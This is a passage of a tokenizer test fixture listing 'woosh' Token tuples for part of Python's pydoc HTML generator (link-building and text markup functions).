woosh.Token(woosh.NAME, 'name', 639, 60, 639, 64),
woosh.Token(woosh.OP, ')', 639, 64, 639, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 639, 65, 640, 0),
woosh.Token(woosh.DEDENT, ' ', 640, 0, 640, 8),
woosh.Token(woosh.DEDENT, '', 640, 8, 640, 8),
woosh.Token(woosh.NAME, 'return', 640, 8, 640, 14),
woosh.Token(woosh.NAME, 'name', 640, 15, 640, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 640, 19, 641, 0),
woosh.Token(woosh.DEDENT, ' ', 642, 0, 642, 4),
woosh.Token(woosh.NAME, 'def', 642, 4, 642, 7),
woosh.Token(woosh.NAME, 'classlink', 642, 8, 642, 17),
woosh.Token(woosh.OP, '(', 642, 17, 642, 18),
woosh.Token(woosh.NAME, 'self', 642, 18, 642, 22),
woosh.Token(woosh.OP, ',', 642, 22, 642, 23),
woosh.Token(woosh.NAME, 'object', 642, 24, 642, 30),
woosh.Token(woosh.OP, ',', 642, 30, 642, 31),
woosh.Token(woosh.NAME, 'modname', 642, 32, 642, 39),
woosh.Token(woosh.OP, ')', 642, 39, 642, 40),
woosh.Token(woosh.OP, ':', 642, 40, 642, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 642, 41, 643, 0),
woosh.Token(woosh.INDENT, ' ', 643, 0, 643, 8),
woosh.Token(woosh.STRING, '"""Make a link for a class."""', 643, 8, 643, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 643, 38, 644, 0),
woosh.Token(woosh.NAME, 'name', 644, 8, 644, 12),
woosh.Token(woosh.OP, ',', 644, 12, 644, 13),
woosh.Token(woosh.NAME, 'module', 644, 14, 644, 20),
woosh.Token(woosh.OP, '=', 644, 21, 644, 22),
woosh.Token(woosh.NAME, 'object', 644, 23, 644, 29),
woosh.Token(woosh.OP, '.', 644, 29, 644, 30),
woosh.Token(woosh.NAME, '__name__', 644, 30, 644, 38),
woosh.Token(woosh.OP, ',', 644, 38, 644, 39),
woosh.Token(woosh.NAME, 'sys', 644, 40, 644, 43),
woosh.Token(woosh.OP, '.', 644, 43, 644, 44),
woosh.Token(woosh.NAME, 'modules', 644, 44, 644, 51),
woosh.Token(woosh.OP, '.', 644, 51, 644, 52),
woosh.Token(woosh.NAME, 'get', 644, 52, 644, 55),
woosh.Token(woosh.OP, '(', 644, 55, 644, 56),
woosh.Token(woosh.NAME, 'object', 644, 56, 644, 62),
woosh.Token(woosh.OP, '.', 644, 62, 644, 63),
woosh.Token(woosh.NAME, '__module__', 644, 63, 644, 73),
woosh.Token(woosh.OP, ')', 644, 73, 644, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 644, 74, 645, 0),
woosh.Token(woosh.NAME, 'if', 645, 8, 645, 10),
woosh.Token(woosh.NAME, 'hasattr', 645, 11, 645, 18),
woosh.Token(woosh.OP, '(', 645, 18, 645, 19),
woosh.Token(woosh.NAME, 'module', 645, 19, 645, 25),
woosh.Token(woosh.OP, ',', 645, 25, 645, 26),
woosh.Token(woosh.NAME, 'name', 645, 27, 645, 31),
woosh.Token(woosh.OP, ')', 645, 31, 645, 32),
woosh.Token(woosh.NAME, 'and', 645, 33, 645, 36),
woosh.Token(woosh.NAME, 'getattr', 645, 37, 645, 44),
woosh.Token(woosh.OP, '(', 645, 44, 645, 45),
woosh.Token(woosh.NAME, 'module', 645, 45, 645, 51),
woosh.Token(woosh.OP, ',', 645, 51, 645, 52),
woosh.Token(woosh.NAME, 'name', 645, 53, 645, 57),
woosh.Token(woosh.OP, ')', 645, 57, 645, 58),
woosh.Token(woosh.NAME, 'is', 645, 59, 645, 61),
woosh.Token(woosh.NAME, 'object', 645, 62, 645, 68),
woosh.Token(woosh.OP, ':', 645, 68, 645, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 645, 69, 646, 0),
woosh.Token(woosh.INDENT, ' ', 646, 0, 646, 12),
woosh.Token(woosh.NAME, 'return', 646, 12, 646, 18),
woosh.Token(woosh.STRING, '\'<a href="%s.html#%s">%s</a>\'', 646, 19, 646, 48),
woosh.Token(woosh.OP, '%', 646, 49, 646, 50),
woosh.Token(woosh.OP, '(', 646, 51, 646, 52),
woosh.Token(woosh.NAME, 'module', 647, 16, 647, 22),
woosh.Token(woosh.OP, '.', 647, 22, 647, 23),
woosh.Token(woosh.NAME, '__name__', 647, 23, 647, 31),
woosh.Token(woosh.OP, ',', 647, 31, 647, 32),
woosh.Token(woosh.NAME, 'name', 647, 33, 647, 37),
woosh.Token(woosh.OP, ',', 647, 37, 647, 38),
woosh.Token(woosh.NAME, 'classname', 647, 39, 647, 48),
woosh.Token(woosh.OP, '(', 647, 48, 647, 49),
woosh.Token(woosh.NAME, 'object', 647, 49, 647, 55),
woosh.Token(woosh.OP, ',', 647, 55, 647, 56),
woosh.Token(woosh.NAME, 'modname', 647, 57, 647, 64),
woosh.Token(woosh.OP, ')', 647, 64, 647, 65),
woosh.Token(woosh.OP, ')', 647, 65, 647, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 647, 66, 648, 0),
woosh.Token(woosh.DEDENT, ' ', 648, 0, 648, 8),
woosh.Token(woosh.NAME, 'return', 648, 8, 648, 14),
woosh.Token(woosh.NAME, 'classname', 648, 15, 648, 24),
woosh.Token(woosh.OP, '(', 648, 24, 648, 25),
woosh.Token(woosh.NAME, 'object', 648, 25, 648, 31),
woosh.Token(woosh.OP, ',', 648, 31, 648, 32),
woosh.Token(woosh.NAME, 'modname', 648, 33, 648, 40),
woosh.Token(woosh.OP, ')', 648, 40, 648, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 648, 41, 649, 0),
woosh.Token(woosh.DEDENT, ' ', 650, 0, 650, 4),
woosh.Token(woosh.NAME, 'def', 650, 4, 650, 7),
woosh.Token(woosh.NAME, 'modulelink', 650, 8, 650, 18),
woosh.Token(woosh.OP, '(', 650, 18, 650, 19),
woosh.Token(woosh.NAME, 'self', 650, 19, 650, 23),
woosh.Token(woosh.OP, ',', 650, 23, 650, 24),
woosh.Token(woosh.NAME, 'object', 650, 25, 650, 31),
woosh.Token(woosh.OP, ')', 650, 31, 650, 32),
woosh.Token(woosh.OP, ':', 650, 32, 650, 33),
woosh.Token(woosh.NEWLINE, '\r\n', 650, 33, 651, 0),
woosh.Token(woosh.INDENT, ' ', 651, 0, 651, 8),
woosh.Token(woosh.STRING, '"""Make a link for a module."""', 651, 8, 651, 39),
woosh.Token(woosh.NEWLINE, '\r\n', 651, 39, 652, 0),
woosh.Token(woosh.NAME, 'return', 652, 8, 652, 14),
woosh.Token(woosh.STRING, '\'<a href="%s.html">%s</a>\'', 652, 15, 652, 41),
woosh.Token(woosh.OP, '%', 652, 42, 652, 43),
woosh.Token(woosh.OP, '(', 652, 44, 652, 45),
woosh.Token(woosh.NAME, 'object', 652, 45, 652, 51),
woosh.Token(woosh.OP, '.', 652, 51, 652, 52),
woosh.Token(woosh.NAME, '__name__', 652, 52, 652, 60),
woosh.Token(woosh.OP, ',', 652, 60, 652, 61),
woosh.Token(woosh.NAME, 'object', 652, 62, 652, 68),
woosh.Token(woosh.OP, '.', 652, 68, 652, 69),
woosh.Token(woosh.NAME, '__name__', 652, 69, 652, 77),
woosh.Token(woosh.OP, ')', 652, 77, 652, 78),
woosh.Token(woosh.NEWLINE, '\r\n', 652, 78, 653, 0),
woosh.Token(woosh.DEDENT, ' ', 654, 0, 654, 4),
woosh.Token(woosh.NAME, 'def', 654, 4, 654, 7),
woosh.Token(woosh.NAME, 'modpkglink', 654, 8, 654, 18),
woosh.Token(woosh.OP, '(', 654, 18, 654, 19),
woosh.Token(woosh.NAME, 'self', 654, 19, 654, 23),
woosh.Token(woosh.OP, ',', 654, 23, 654, 24),
woosh.Token(woosh.NAME, 'modpkginfo', 654, 25, 654, 35),
woosh.Token(woosh.OP, ')', 654, 35, 654, 36),
woosh.Token(woosh.OP, ':', 654, 36, 654, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 654, 37, 655, 0),
woosh.Token(woosh.INDENT, ' ', 655, 0, 655, 8),
woosh.Token(woosh.STRING, '"""Make a link for a module or package to display in an index."""', 655, 8, 655, 73),
woosh.Token(woosh.NEWLINE, '\r\n', 655, 73, 656, 0),
woosh.Token(woosh.NAME, 'name', 656, 8, 656, 12),
woosh.Token(woosh.OP, ',', 656, 12, 656, 13),
woosh.Token(woosh.NAME, 'path', 656, 14, 656, 18),
woosh.Token(woosh.OP, ',', 656, 18, 656, 19),
woosh.Token(woosh.NAME, 'ispackage', 656, 20, 656, 29),
woosh.Token(woosh.OP, ',', 656, 29, 656, 30),
woosh.Token(woosh.NAME, 'shadowed', 656, 31, 656, 39),
woosh.Token(woosh.OP, '=', 656, 40, 656, 41),
woosh.Token(woosh.NAME, 'modpkginfo', 656, 42, 656, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 656, 52, 657, 0),
woosh.Token(woosh.NAME, 'if', 657, 8, 657, 10),
woosh.Token(woosh.NAME, 'shadowed', 657, 11, 657, 19),
woosh.Token(woosh.OP, ':', 657, 19, 657, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 657, 20, 658, 0),
woosh.Token(woosh.INDENT, ' ', 658, 0, 658, 12),
woosh.Token(woosh.NAME, 'return', 658, 12, 658, 18),
woosh.Token(woosh.NAME, 'self', 658, 19, 658, 23),
woosh.Token(woosh.OP, '.', 658, 23, 658, 24),
woosh.Token(woosh.NAME, 'grey', 658, 24, 658, 28),
woosh.Token(woosh.OP, '(', 658, 28, 658, 29),
woosh.Token(woosh.NAME, 'name', 658, 29, 658, 33),
woosh.Token(woosh.OP, ')', 658, 33, 658, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 658, 34, 659, 0),
woosh.Token(woosh.DEDENT, ' ', 659, 0, 659, 8),
woosh.Token(woosh.NAME, 'if', 659, 8, 659, 10),
woosh.Token(woosh.NAME, 'path', 659, 11, 659, 15),
woosh.Token(woosh.OP, ':', 659, 15, 659, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 659, 16, 660, 0),
woosh.Token(woosh.INDENT, ' ', 660, 0, 660, 12),
woosh.Token(woosh.NAME, 'url', 660, 12, 660, 15),
woosh.Token(woosh.OP, '=', 660, 16, 660, 17),
woosh.Token(woosh.STRING, "'%s.%s.html'", 660, 18, 660, 30),
woosh.Token(woosh.OP, '%', 660, 31, 660, 32),
woosh.Token(woosh.OP, '(', 660, 33, 660, 34),
woosh.Token(woosh.NAME, 'path', 660, 34, 660, 38),
woosh.Token(woosh.OP, ',', 660, 38, 660, 39),
woosh.Token(woosh.NAME, 'name', 660, 40, 660, 44),
woosh.Token(woosh.OP, ')', 660, 44, 660, 45),
woosh.Token(woosh.NEWLINE, '\r\n', 660, 45, 661, 0),
woosh.Token(woosh.DEDENT, ' ', 661, 0, 661, 8),
woosh.Token(woosh.NAME, 'else', 661, 8, 661, 12),
woosh.Token(woosh.OP, ':', 661, 12, 661, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 661, 13, 662, 0),
woosh.Token(woosh.INDENT, ' ', 662, 0, 662, 12),
woosh.Token(woosh.NAME, 'url', 662, 12, 662, 15),
woosh.Token(woosh.OP, '=', 662, 16, 662, 17),
woosh.Token(woosh.STRING, "'%s.html'", 662, 18, 662, 27),
woosh.Token(woosh.OP, '%', 662, 28, 662, 29),
woosh.Token(woosh.NAME, 'name', 662, 30, 662, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 662, 34, 663, 0),
woosh.Token(woosh.DEDENT, ' ', 663, 0, 663, 8),
woosh.Token(woosh.NAME, 'if', 663, 8, 663, 10),
woosh.Token(woosh.NAME, 'ispackage', 663, 11, 663, 20),
woosh.Token(woosh.OP, ':', 663, 20, 663, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 663, 21, 664, 0),
woosh.Token(woosh.INDENT, ' ', 664, 0, 664, 12),
woosh.Token(woosh.NAME, 'text', 664, 12, 664, 16),
woosh.Token(woosh.OP, '=', 664, 17, 664, 18),
woosh.Token(woosh.STRING, "'<strong>%s</strong> (package)'", 664, 19, 664, 55),
woosh.Token(woosh.OP, '%', 664, 56, 664, 57),
woosh.Token(woosh.NAME, 'name', 664, 58, 664, 62),
woosh.Token(woosh.NEWLINE, '\r\n', 664, 62, 665, 0),
woosh.Token(woosh.DEDENT, ' ', 665, 0, 665, 8),
woosh.Token(woosh.NAME, 'else', 665, 8, 665, 12),
woosh.Token(woosh.OP, ':', 665, 12, 665, 13),
woosh.Token(woosh.NEWLINE, '\r\n', 665, 13, 666, 0),
woosh.Token(woosh.INDENT, ' ', 666, 0, 666, 12),
woosh.Token(woosh.NAME, 'text', 666, 12, 666, 16),
woosh.Token(woosh.OP, '=', 666, 17, 666, 18),
woosh.Token(woosh.NAME, 'name', 666, 19, 666, 23),
woosh.Token(woosh.NEWLINE, '\r\n', 666, 23, 667, 0),
woosh.Token(woosh.DEDENT, ' ', 667, 0, 667, 8),
woosh.Token(woosh.NAME, 'return', 667, 8, 667, 14),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 667, 15, 667, 36),
woosh.Token(woosh.OP, '%', 667, 37, 667, 38),
woosh.Token(woosh.OP, '(', 667, 39, 667, 40),
woosh.Token(woosh.NAME, 'url', 667, 40, 667, 43),
woosh.Token(woosh.OP, ',', 667, 43, 667, 44),
woosh.Token(woosh.NAME, 'text', 667, 45, 667, 49),
woosh.Token(woosh.OP, ')', 667, 49, 667, 50),
woosh.Token(woosh.NEWLINE, '\r\n', 667, 50, 668, 0),
woosh.Token(woosh.DEDENT, ' ', 669, 0, 669, 4),
woosh.Token(woosh.NAME, 'def', 669, 4, 669, 7),
woosh.Token(woosh.NAME, 'filelink', 669, 8, 669, 16),
woosh.Token(woosh.OP, '(', 669, 16, 669, 17),
woosh.Token(woosh.NAME, 'self', 669, 17, 669, 21),
woosh.Token(woosh.OP, ',', 669, 21, 669, 22),
woosh.Token(woosh.NAME, 'url', 669, 23, 669, 26),
woosh.Token(woosh.OP, ',', 669, 26, 669, 27),
woosh.Token(woosh.NAME, 'path', 669, 28, 669, 32),
woosh.Token(woosh.OP, ')', 669, 32, 669, 33),
woosh.Token(woosh.OP, ':', 669, 33, 669, 34),
woosh.Token(woosh.NEWLINE, '\r\n', 669, 34, 670, 0),
woosh.Token(woosh.INDENT, ' ', 670, 0, 670, 8),
woosh.Token(woosh.STRING, '"""Make a link to source file."""', 670, 8, 670, 41),
woosh.Token(woosh.NEWLINE, '\r\n', 670, 41, 671, 0),
woosh.Token(woosh.NAME, 'return', 671, 8, 671, 14),
woosh.Token(woosh.STRING, '\'<a href="file:%s">%s</a>\'', 671, 15, 671, 41),
woosh.Token(woosh.OP, '%', 671, 42, 671, 43),
woosh.Token(woosh.OP, '(', 671, 44, 671, 45),
woosh.Token(woosh.NAME, 'url', 671, 45, 671, 48),
woosh.Token(woosh.OP, ',', 671, 48, 671, 49),
woosh.Token(woosh.NAME, 'path', 671, 50, 671, 54),
woosh.Token(woosh.OP, ')', 671, 54, 671, 55),
woosh.Token(woosh.NEWLINE, '\r\n', 671, 55, 672, 0),
woosh.Token(woosh.DEDENT, ' ', 673, 0, 673, 4),
woosh.Token(woosh.NAME, 'def', 673, 4, 673, 7),
woosh.Token(woosh.NAME, 'markup', 673, 8, 673, 14),
woosh.Token(woosh.OP, '(', 673, 14, 673, 15),
woosh.Token(woosh.NAME, 'self', 673, 15, 673, 19),
woosh.Token(woosh.OP, ',', 673, 19, 673, 20),
woosh.Token(woosh.NAME, 'text', 673, 21, 673, 25),
woosh.Token(woosh.OP, ',', 673, 25, 673, 26),
woosh.Token(woosh.NAME, 'escape', 673, 27, 673, 33),
woosh.Token(woosh.OP, '=', 673, 33, 673, 34),
woosh.Token(woosh.NAME, 'None', 673, 34, 673, 38),
woosh.Token(woosh.OP, ',', 673, 38, 673, 39),
woosh.Token(woosh.NAME, 'funcs', 673, 40, 673, 45),
woosh.Token(woosh.OP, '=', 673, 45, 673, 46),
woosh.Token(woosh.OP, '{', 673, 46, 673, 47),
woosh.Token(woosh.OP, '}', 673, 47, 673, 48),
woosh.Token(woosh.OP, ',', 673, 48, 673, 49),
woosh.Token(woosh.NAME, 'classes', 673, 50, 673, 57),
woosh.Token(woosh.OP, '=', 673, 57, 673, 58),
woosh.Token(woosh.OP, '{', 673, 58, 673, 59),
woosh.Token(woosh.OP, '}', 673, 59, 673, 60),
woosh.Token(woosh.OP, ',', 673, 60, 673, 61),
woosh.Token(woosh.NAME, 'methods', 673, 62, 673, 69),
woosh.Token(woosh.OP, '=', 673, 69, 673, 70),
woosh.Token(woosh.OP, '{', 673, 70, 673, 71),
woosh.Token(woosh.OP, '}', 673, 71, 673, 72),
woosh.Token(woosh.OP, ')', 673, 72, 673, 73),
woosh.Token(woosh.OP, ':', 673, 73, 673, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 673, 74, 674, 0),
woosh.Token(woosh.INDENT, ' ', 674, 0, 674, 8),
woosh.Token(woosh.STRING, '"""Mark up some plain text, given a context of symbols to look for.\r\n Each context dictionary maps object names to anchor names."""', 674, 8, 675, 69),
woosh.Token(woosh.NEWLINE, '\r\n', 675, 69, 676, 0),
woosh.Token(woosh.NAME, 'escape', 676, 8, 676, 14),
woosh.Token(woosh.OP, '=', 676, 15, 676, 16),
woosh.Token(woosh.NAME, 'escape', 676, 17, 676, 23),
woosh.Token(woosh.NAME, 'or', 676, 24, 676, 26),
woosh.Token(woosh.NAME, 'self', 676, 27, 676, 31),
woosh.Token(woosh.OP, '.', 676, 31, 676, 32),
woosh.Token(woosh.NAME, 'escape', 676, 32, 676, 38),
woosh.Token(woosh.NEWLINE, '\r\n', 676, 38, 677, 0),
woosh.Token(woosh.NAME, 'results', 677, 8, 677, 15),
woosh.Token(woosh.OP, '=', 677, 16, 677, 17),
woosh.Token(woosh.OP, '[', 677, 18, 677, 19),
woosh.Token(woosh.OP, ']', 677, 19, 677, 20),
woosh.Token(woosh.NEWLINE, '\r\n', 677, 20, 678, 0),
woosh.Token(woosh.NAME, 'here', 678, 8, 678, 12),
woosh.Token(woosh.OP, '=', 678, 13, 678, 14),
woosh.Token(woosh.NUMBER, '0', 678, 15, 678, 16),
woosh.Token(woosh.NEWLINE, '\r\n', 678, 16, 679, 0),
woosh.Token(woosh.NAME, 'pattern', 679, 8, 679, 15),
woosh.Token(woosh.OP, '=', 679, 16, 679, 17),
woosh.Token(woosh.NAME, 're', 679, 18, 679, 20),
woosh.Token(woosh.OP, '.', 679, 20, 679, 21),
woosh.Token(woosh.NAME, 'compile', 679, 21, 679, 28),
woosh.Token(woosh.OP, '(', 679, 28, 679, 29),
woosh.Token(woosh.STRING, "r'\\b((http|https|ftp)://\\S+[\\w/]|'", 679, 29, 679, 63),
woosh.Token(woosh.STRING, "r'RFC[- ]?(\\d+)|'", 680, 32, 680, 49),
woosh.Token(woosh.STRING, "r'PEP[- ]?(\\d+)|'", 681, 32, 681, 49),
woosh.Token(woosh.STRING, "r'(self\\.)?(\\w+))'", 682, 32, 682, 50),
woosh.Token(woosh.OP, ')', 682, 50, 682, 51),
woosh.Token(woosh.NEWLINE, '\r\n', 682, 51, 683, 0),
woosh.Token(woosh.NAME, 'while', 683, 8, 683, 13),
woosh.Token(woosh.NAME, 'True', 683, 14, 683, 18),
woosh.Token(woosh.OP, ':', 683, 18, 683, 19),
woosh.Token(woosh.NEWLINE, '\r\n', 683, 19, 684, 0),
woosh.Token(woosh.INDENT, ' ', 684, 0, 684, 12),
woosh.Token(woosh.NAME, 'match', 684, 12, 684, 17),
woosh.Token(woosh.OP, '=', 684, 18, 684, 19),
woosh.Token(woosh.NAME, 'pattern', 684, 20, 684, 27),
woosh.Token(woosh.OP, '.', 684, 27, 684, 28),
woosh.Token(woosh.NAME, 'search', 684, 28, 684, 34),
woosh.Token(woosh.OP, '(', 684, 34, 684, 35),
woosh.Token(woosh.NAME, 'text', 684, 35, 684, 39),
woosh.Token(woosh.OP, ',', 684, 39, 684, 40),
woosh.Token(woosh.NAME, 'here', 684, 41, 684, 45),
woosh.Token(woosh.OP, ')', 684, 45, 684, 46),
woosh.Token(woosh.NEWLINE, '\r\n', 684, 46, 685, 0),
woosh.Token(woosh.NAME, 'if', 685, 12, 685, 14),
woosh.Token(woosh.NAME, 'not', 685, 15, 685, 18),
woosh.Token(woosh.NAME, 'match', 685, 19, 685, 24),
woosh.Token(woosh.OP, ':', 685, 24, 685, 25),
woosh.Token(woosh.NAME, 'break', 685, 26, 685, 31),
woosh.Token(woosh.NEWLINE, '\r\n', 685, 31, 686, 0),
woosh.Token(woosh.NAME, 'start', 686, 12, 686, 17),
woosh.Token(woosh.OP, ',', 686, 17, 686, 18),
woosh.Token(woosh.NAME, 'end', 686, 19, 686, 22),
woosh.Token(woosh.OP, '=', 686, 23, 686, 24),
woosh.Token(woosh.NAME, 'match', 686, 25, 686, 30),
woosh.Token(woosh.OP, '.', 686, 30, 686, 31),
woosh.Token(woosh.NAME, 'span', 686, 31, 686, 35),
woosh.Token(woosh.OP, '(', 686, 35, 686, 36),
woosh.Token(woosh.OP, ')', 686, 36, 686, 37),
woosh.Token(woosh.NEWLINE, '\r\n', 686, 37, 687, 0),
woosh.Token(woosh.NAME, 'results', 687, 12, 687, 19),
woosh.Token(woosh.OP, '.', 687, 19, 687, 20),
woosh.Token(woosh.NAME, 'append', 687, 20, 687, 26),
woosh.Token(woosh.OP, '(', 687, 26, 687, 27),
woosh.Token(woosh.NAME, 'escape', 687, 27, 687, 33),
woosh.Token(woosh.OP, '(', 687, 33, 687, 34),
woosh.Token(woosh.NAME, 'text', 687, 34, 687, 38),
woosh.Token(woosh.OP, '[', 687, 38, 687, 39),
woosh.Token(woosh.NAME, 'here', 687, 39, 687, 43),
woosh.Token(woosh.OP, ':', 687, 43, 687, 44),
woosh.Token(woosh.NAME, 'start', 687, 44, 687, 49),
woosh.Token(woosh.OP, ']', 687, 49, 687, 50),
woosh.Token(woosh.OP, ')', 687, 50, 687, 51),
woosh.Token(woosh.OP, ')', 687, 51, 687, 52),
woosh.Token(woosh.NEWLINE, '\r\n', 687, 52, 688, 0),
woosh.Token(woosh.NAME, 'all', 689, 12, 689, 15),
woosh.Token(woosh.OP, ',', 689, 15, 689, 16),
woosh.Token(woosh.NAME, 'scheme', 689, 17, 689, 23),
woosh.Token(woosh.OP, ',', 689, 23, 689, 24),
woosh.Token(woosh.NAME, 'rfc', 689, 25, 689, 28),
woosh.Token(woosh.OP, ',', 689, 28, 689, 29),
woosh.Token(woosh.NAME, 'pep', 689, 30, 689, 33),
woosh.Token(woosh.OP, ',', 689, 33, 689, 34),
woosh.Token(woosh.NAME, 'selfdot', 689, 35, 689, 42),
woosh.Token(woosh.OP, ',', 689, 42, 689, 43),
woosh.Token(woosh.NAME, 'name', 689, 44, 689, 48),
woosh.Token(woosh.OP, '=', 689, 49, 689, 50),
woosh.Token(woosh.NAME, 'match', 689, 51, 689, 56),
woosh.Token(woosh.OP, '.', 689, 56, 689, 57),
woosh.Token(woosh.NAME, 'groups', 689, 57, 689, 63),
woosh.Token(woosh.OP, '(', 689, 63, 689, 64),
woosh.Token(woosh.OP, ')', 689, 64, 689, 65),
woosh.Token(woosh.NEWLINE, '\r\n', 689, 65, 690, 0),
woosh.Token(woosh.NAME, 'if', 690, 12, 690, 14),
woosh.Token(woosh.NAME, 'scheme', 690, 15, 690, 21),
woosh.Token(woosh.OP, ':', 690, 21, 690, 22),
woosh.Token(woosh.NEWLINE, '\r\n', 690, 22, 691, 0),
woosh.Token(woosh.INDENT, ' ', 691, 0, 691, 16),
woosh.Token(woosh.NAME, 'url', 691, 16, 691, 19),
woosh.Token(woosh.OP, '=', 691, 20, 691, 21),
woosh.Token(woosh.NAME, 'escape', 691, 22, 691, 28),
woosh.Token(woosh.OP, '(', 691, 28, 691, 29),
woosh.Token(woosh.NAME, 'all', 691, 29, 691, 32),
woosh.Token(woosh.OP, ')', 691, 32, 691, 33),
woosh.Token(woosh.OP, '.', 691, 33, 691, 34),
woosh.Token(woosh.NAME, 'replace', 691, 34, 691, 41),
woosh.Token(woosh.OP, '(', 691, 41, 691, 42),
woosh.Token(woosh.STRING, '\'"\'', 691, 42, 691, 45),
woosh.Token(woosh.OP, ',', 691, 45, 691, 46),
woosh.Token(woosh.STRING, "'"'", 691, 47, 691, 55),
woosh.Token(woosh.OP, ')', 691, 55, 691, 56),
woosh.Token(woosh.NEWLINE, '\r\n', 691, 56, 692, 0),
woosh.Token(woosh.NAME, 'results', 692, 16, 692, 23),
woosh.Token(woosh.OP, '.', 692, 23, 692, 24),
woosh.Token(woosh.NAME, 'append', 692, 24, 692, 30),
woosh.Token(woosh.OP, '(', 692, 30, 692, 31),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 692, 31, 692, 52),
woosh.Token(woosh.OP, '%', 692, 53, 692, 54),
woosh.Token(woosh.OP, '(', 692, 55, 692, 56),
woosh.Token(woosh.NAME, 'url', 692, 56, 692, 59),
woosh.Token(woosh.OP, ',', 692, 59, 692, 60),
woosh.Token(woosh.NAME, 'url', 692, 61, 692, 64),
woosh.Token(woosh.OP, ')', 692, 64, 692, 65),
woosh.Token(woosh.OP, ')', 692, 65, 692, 66),
woosh.Token(woosh.NEWLINE, '\r\n', 692, 66, 693, 0),
woosh.Token(woosh.DEDENT, ' ', 693, 0, 693, 12),
woosh.Token(woosh.NAME, 'elif', 693, 12, 693, 16),
woosh.Token(woosh.NAME, 'rfc', 693, 17, 693, 20),
woosh.Token(woosh.OP, ':', 693, 20, 693, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 693, 21, 694, 0),
woosh.Token(woosh.INDENT, ' ', 694, 0, 694, 16),
woosh.Token(woosh.NAME, 'url', 694, 16, 694, 19),
woosh.Token(woosh.OP, '=', 694, 20, 694, 21),
woosh.Token(woosh.STRING, "'http://www.rfc-editor.org/rfc/rfc%d.txt'", 694, 22, 694, 63),
woosh.Token(woosh.OP, '%', 694, 64, 694, 65),
woosh.Token(woosh.NAME, 'int', 694, 66, 694, 69),
woosh.Token(woosh.OP, '(', 694, 69, 694, 70),
woosh.Token(woosh.NAME, 'rfc', 694, 70, 694, 73),
woosh.Token(woosh.OP, ')', 694, 73, 694, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 694, 74, 695, 0),
woosh.Token(woosh.NAME, 'results', 695, 16, 695, 23),
woosh.Token(woosh.OP, '.', 695, 23, 695, 24),
woosh.Token(woosh.NAME, 'append', 695, 24, 695, 30),
woosh.Token(woosh.OP, '(', 695, 30, 695, 31),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 695, 31, 695, 52),
woosh.Token(woosh.OP, '%', 695, 53, 695, 54),
woosh.Token(woosh.OP, '(', 695, 55, 695, 56),
woosh.Token(woosh.NAME, 'url', 695, 56, 695, 59),
woosh.Token(woosh.OP, ',', 695, 59, 695, 60),
woosh.Token(woosh.NAME, 'escape', 695, 61, 695, 67),
woosh.Token(woosh.OP, '(', 695, 67, 695, 68),
woosh.Token(woosh.NAME, 'all', 695, 68, 695, 71),
woosh.Token(woosh.OP, ')', 695, 71, 695, 72),
woosh.Token(woosh.OP, ')', 695, 72, 695, 73),
woosh.Token(woosh.OP, ')', 695, 73, 695, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 695, 74, 696, 0),
woosh.Token(woosh.DEDENT, ' ', 696, 0, 696, 12),
woosh.Token(woosh.NAME, 'elif', 696, 12, 696, 16),
woosh.Token(woosh.NAME, 'pep', 696, 17, 696, 20),
woosh.Token(woosh.OP, ':', 696, 20, 696, 21),
woosh.Token(woosh.NEWLINE, '\r\n', 696, 21, 697, 0),
woosh.Token(woosh.INDENT, ' ', 697, 0, 697, 16),
woosh.Token(woosh.NAME, 'url', 697, 16, 697, 19),
woosh.Token(woosh.OP, '=', 697, 20, 697, 21),
woosh.Token(woosh.STRING, "'http://www.python.org/dev/peps/pep-%04d/'", 697, 22, 697, 64),
woosh.Token(woosh.OP, '%', 697, 65, 697, 66),
woosh.Token(woosh.NAME, 'int', 697, 67, 697, 70),
woosh.Token(woosh.OP, '(', 697, 70, 697, 71),
woosh.Token(woosh.NAME, 'pep', 697, 71, 697, 74),
woosh.Token(woosh.OP, ')', 697, 74, 697, 75),
woosh.Token(woosh.NEWLINE, '\r\n', 697, 75, 698, 0),
woosh.Token(woosh.NAME, 'results', 698, 16, 698, 23),
woosh.Token(woosh.OP, '.', 698, 23, 698, 24),
woosh.Token(woosh.NAME, 'append', 698, 24, 698, 30),
woosh.Token(woosh.OP, '(', 698, 30, 698, 31),
woosh.Token(woosh.STRING, '\'<a href="%s">%s</a>\'', 698, 31, 698, 52),
woosh.Token(woosh.OP, '%', 698, 53, 698, 54),
woosh.Token(woosh.OP, '(', 698, 55, 698, 56),
woosh.Token(woosh.NAME, 'url', 698, 56, 698, 59),
woosh.Token(woosh.OP, ',', 698, 59, 698, 60),
woosh.Token(woosh.NAME, 'escape', 698, 61, 698, 67),
woosh.Token(woosh.OP, '(', 698, 67, 698, 68),
woosh.Token(woosh.NAME, 'all', 698, 68, 698, 71),
woosh.Token(woosh.OP, ')', 698, 71, 698, 72),
woosh.Token(woosh.OP, ')', 698, 72, 698, 73),
woosh.Token(woosh.OP, ')', 698, 73, 698, 74),
woosh.Token(woosh.NEWLINE, '\r\n', 698, 74, 699, 0),
woosh.Token(woosh.DEDENT, ' ', 699, 0, 699, 12),
woosh.Token(woosh.NAME, 'elif', 699, 12, 699, 16),
woosh.Token(woosh.NAME, 'selfdot', 699, 17, 699, 24),
woosh.Token(woosh.OP, ':', 699, 24, 699, 25),
woosh.Token(woosh.NEWLINE, '\r\n', 699, 25, 700, 0),
